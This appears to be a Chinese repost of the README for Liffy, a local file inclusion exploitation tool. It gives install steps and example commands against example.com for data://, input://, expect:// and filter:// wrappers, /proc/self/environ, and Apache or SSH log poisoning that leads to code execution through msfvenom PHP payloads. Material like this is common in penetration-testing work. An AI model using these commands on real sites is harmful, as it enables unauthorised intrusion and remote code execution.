工具安装
确保您正在使用python3安装过程。liffy doesn't support python2
-
克隆存储库
-
git clone
http://github.com/mzfr/liffy
-
建立虚拟环境
例如:python3 -m venv liffy
-
python3 -m venv <name-of-virtual-env>
-
激活虚拟
-
source liffy/bin/activate
-
安装依赖
-
pip3 install -r requirements.txt
注意 -Liffy使用msfvenom生成php有效负载,因此您应该安装metasploit
工具使用
用法:liffy.py [-h] [-d] [-i] [-e] [-f] [-p] [-a] [-ns] [-r] [--ssh] [-l位置] [--cookie cookie]
网址
位置参数:
网址URL,以测试 为 LFI
可选参数:
-h,-- help显示此帮助消息并退出
-d,--data使用data://技术
-i,--input使用input://技术
-e,--expect使用Expect://技术
-f,--filter使用filter://技术
-p,--proc使用/ proc / self / environ技术
-a,--access访问日志技术
-ns,--nostager直接执行有效负载,请勿使用stager
-r,-相对使用路径遍历序列进行攻击
--ssh SSH身份验证日志中毒
-l位置,-位置位置
目标文件的路径(访问日志,身份验证日志等)
--cookies COOKIES会话cookie 以进行身份验证
检查URL与数据://
选项:-d或--data
例如:python liffy.py
http://example.com/?id= -d
使用输入://检查URL
选项:-i或--input
例如:python liffy.py
http://example.com/?id= -i
检查URL与期望://
选项:-e或--expect
例如:python liffy.py
http://example.com/?id= -e
使用filter://检查URL
选项:-f或--filter
例如:python liffy.py
http://example.com/?id= -f
使用/ proc / self / environ执行代码
选项:-p或--proc
例如:python liffy.py
http://example.com/?id= -p
使用Apache access.log中毒
选项:-a或--access
例如:python liffy.py
http://example.com/?id= -a
使用SSH auth.log中毒
选项:-s或--ssh
例如:python liffy.py
http://example.com/?id= -s
相对遍历目录
选项:-r
此选项可以与其他选项一起使用,以便相对遍历目录。
例如:
- python liffy.py
http://example.com/?id= -s -r
- python liffy.py
http://example.com/?id= -p -r
- python liffy.py
http://example.com/?id= -a -r
指定日志路径
选项:-l或--location
此选项必须与所有日志技术(如authlog,sshlog
例如:
- python liffy.py
http://example.com/?id= -s -l /var/auth.log
- python liffy.py
http://example.com/?id= -a -l /var/apache2/access.log
默认情况下,使用以下位置:
-
对于SSH auth.log- /var/log/auth.log
-
对于apache2 access.log- /var/log/apache2/access.log
文章来源:
https://github.com/mzfr/liffy/
推荐文章++++
本文始发于微信公众号(黑白之道):Liffy-本地文件包含利用工具
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论